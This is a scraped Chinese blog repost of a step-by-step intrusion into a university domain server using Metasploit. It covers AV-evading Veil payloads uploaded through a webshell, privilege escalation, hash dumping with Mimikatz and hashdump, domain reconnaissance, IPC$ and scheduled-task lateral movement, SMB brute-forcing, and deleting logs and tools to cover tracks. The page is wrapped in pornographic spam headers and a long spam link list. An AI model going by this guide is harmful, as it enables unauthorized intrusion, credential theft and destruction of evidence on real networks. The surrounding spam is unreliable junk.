日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Metasploit渗透某高校域服务器

發布時間:2024/9/21 编程问答 44 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Metasploit渗透某高校域服务器 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?

本文作者:i 春秋簽約作家——shuteer

?前期準備:1. 使用Veil生成免殺PAYLOAD; 2. 有一個外網IP的服務器,安裝好metasploit,方便操作。

一.SHELL反彈meterpreter

上傳免殺的PAYLOAD到SHELL(有時候會碰到EXE文件上傳不了,可以使用powershell的meterpreter模塊“XX.bat格式”來實現),然后在菜刀或者WEBSHELL下面運行,反彈成功。

二.提權

反彈成功后第一步就是getuid看權限,然后嘗試提權,有以下幾種方法

1.利用漏洞模塊提權,如ms15_05之類

2.令牌假冒

3.繞過Windows賬戶控制,比如Bypassuac提權

4.HASH攻擊

如果服務器沒有提權成功也不要緊,可以以此服務器為跳板,攻擊內網其它服務器

好吧,我是system權限,就不用提權了,直接抓HASH吧!

1.使用WCE和MIMIKATZ(這2個工具必須要管理員的權限,而且注意工具的免殺)

2.使用MSF的hashdump模塊,一個是hashdump,只能導出本地hash,另一個是smart_hashdump(必須是管理員權限),可以導出域用戶的hash

3.使用Powershell模塊直接導出

三.信息收集

1.ipconfig /all

http://2.net view /domain 查看有幾個域

http://3.net view /domain:XXX 查看此域內電腦

http://4.net group /domain 查詢域里面的組

http://5.net group “domain admins” /domain 查看域管理員

http://6.net group “domain controllers” /domain 查看域控制器

http://7.net group “enterprise admins” /domain 查看企業管理組

其他還有很多,網上可以一搜一大把,大家可以都試試

此時我們大概清楚了該內網的大概拓撲,知道域服務器是10.48.128.20

四.分析下一步攻擊方向

分析下此時情況,我們已經獲取了一個服務器的密碼。我們第一目標當然是域服務器,此時有二種情況,當前服務器可以連接域服務器和不可以連接域服務器

A.如果不能直接攻擊域服務器,我們需要再攻擊內網某個服務器,然后再攻擊域服務器

1.我們可以利用抓到的密碼加上我們收集的信息編個字典,然后添加路由進行弱口令的掃描

2.使用p**ec爆破整個局域網或者反彈meterpreter

3.利用smb_login模塊掃描內網

4.利用當前權限,用WIN下面的P**ec進行內網滲透

5.使用powershell對內網進行掃描(要求WIN7以上服務器)

6.架設socks4a,然后進行內網掃描

7.利用當前權限,進行內網IPC$滲透

B.可以直接攻擊域服務器

五. 攻擊域服務器

我們這次是可以直接攻擊域服務器的,所以我們用最簡單的方法IPC$滲透先試試

失敗了

我們再用WIN下面的P**ec試試

又失敗了,不應該啊,我們再仔細分析下,加上域名試試。

看,成功了,我們net use可以看到已經成功連接上了

Net use \\ip\c$

Copy sd.exe \\ip\c$ (其中sd.exe是VEIL生成的meterpreter)

Net time \\ip

At \\ip time c:\sd.exe

具體看截圖

然后exit到meterpreter,設置meterpreter>background,

設置監聽,等待反彈

可以看到,已經反彈成功了,我們看下IP地址是不是域服務器的

我們已經成功的獲取了域服務器的meterpreter,看下權限getuid

好吧,我們是system權限,就不用提權了,為了使meterpreter shell更穩定和更隱蔽,先把meterpreter shell程序進程遷移到EXPLORE進程

PS 獲取一系列的運行進程,使用migrate PID ,然后KILL掉原來的進程

我們接下來抓HASH,可以用Mimikatz也可以用run post/windows/gather/hashdump

PS:我們在用Mimikatz抓HASH之前要注意一點,如果服務器是安裝的64位操作系統,要把Mimikatz進程遷移到一個64位的程序進程中,才能查看64位系統密碼明文。32位系統沒有這個限制,都可以查看系統密碼.

這里為了方便,我們使用hashdump來抓hash,run post/windows/gather/hashdump

失敗了,權限不夠,我們看下自己的權限,因為剛才遷移PAYLOAD進程時候,EXPLOR是administrator權限,我們getsystem,再抓,見圖,成功了

六.SMB快速擴張控制權限

參照第4步,這里我們使用p**ec爆破內網或者利用smb_login模塊爆破內網

1.msf 添加路由 route add ip mask sessionid

2.smb_login模塊或者p**ec_scanner模塊

查看爆破成功的機器 creds

最后我們看一下session控制圖

七.擦PP

所有操作完成后,一定要記得清理下痕跡

1.刪除所有使用的工具

2.刪除所有操作記錄

3.關閉所有的meterpreter

《Metasploit——后門篇》返回到 i春秋社區 < < < < 查看哦,謝謝!

總結

以上是生活随笔為你收集整理的Metasploit渗透某高校域服务器的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 女女同性女同一区二区三区九色 | 香蕉污视频在线观看 | 成人有色视频 | 亚色中文字幕 | 久久久久久黄色 | 91学生片黄 | 电影《走路上学》免费 | 精品中文字幕在线播放 | 夜夜爽av| 一区二区不卡在线观看 | 老司机在线免费视频 | 来吧亚洲综合网 | 寂寞午夜影院 | 久久久精品在线 | 色丁香婷婷| 国产绿帽刺激高潮对白 | 青青草黄色 | 67194av| 黄色片在线免费观看 | av免费网站| 午夜在线观看免费视频 | 欧美久久久久久久久久 | 亚洲天堂成人在线 | 久久精品二区 | 不卡中文av | 日本久久久久久久久久久 | 揄拍成人国产精品视频 | 精品视频久久 | 色婷婷免费 | 中国黄色一级视频 | 五月天婷婷综合 | 夜夜夜操操操 | 调教91 | 6080av| 成人性生交大免费看 | 亚色图| 亚洲午夜精品 | 成年人视频网址 | 动漫av网站| 巨大乳の揉んで乳榨り奶水 | 玉丸(双性调教) | 人人妻人人澡人人爽国产一区 | 日韩一区二区免费视频 | 欧美经典一区二区 | 久久天堂av| av成人动漫 | 加勒比hezyo黑人专区 | 九热这里只有精品 | 国产欧美一区二区三区免费看 | 日日噜噜夜夜狠狠久久波多野 | 看了让人下面流水的视频 | 亚洲一区日本 | 中文在线观看av | 亚洲av无码潮喷在线观看 | 日韩深夜在线 | 亚洲女人天堂成人av在线 | 欧美aⅴ在线观看 | a∨鲁丝一区鲁丝二区鲁丝三区 | 夜间福利网站 | 国产精品国产三级国产专播精品人 | 国产毛片欧美毛片久久久 | 日韩av不卡在线观看 | 日韩不卡在线观看 | 亚洲精品国产91 | 精品国产乱码久久久久久免费 | 久久亚洲精品小早川怜子 | 久久视奸 | 国产精品久久久久久久久久久免费看 | 成人www | 亚洲一区二区免费 | 99久久久无码国产精品性色戒 | 美日韩精品 | 国产片久久 | 尤物av在线| 最新地址在线观看 | 中文字幕在线国产 | 中文在线不卡 | 蜜美杏av| 国产综合社区 | 亚洲中字在线 | 国产乱淫av麻豆国产免费 | 五月天激情影院 | 婷婷丁香综合网 | 日韩av网站在线 | 97超碰人人爱 | 我要看一级黄色片 | 亚洲精品www久久久久久 | 午夜精品久久久久久久99老熟妇 | 欧美大片在线观看 | 青娱乐在线免费视频 | 亚洲成人精品 | 亚洲国产精品成人综合色在线婷婷 | 国产精品永久免费观看 | 久久久久久久久久久久电影 | 人妻互换一区二区三区四区五区 | 日韩综合网站 | 成人激情视频 | 久久精品免费在线观看 | 99福利网|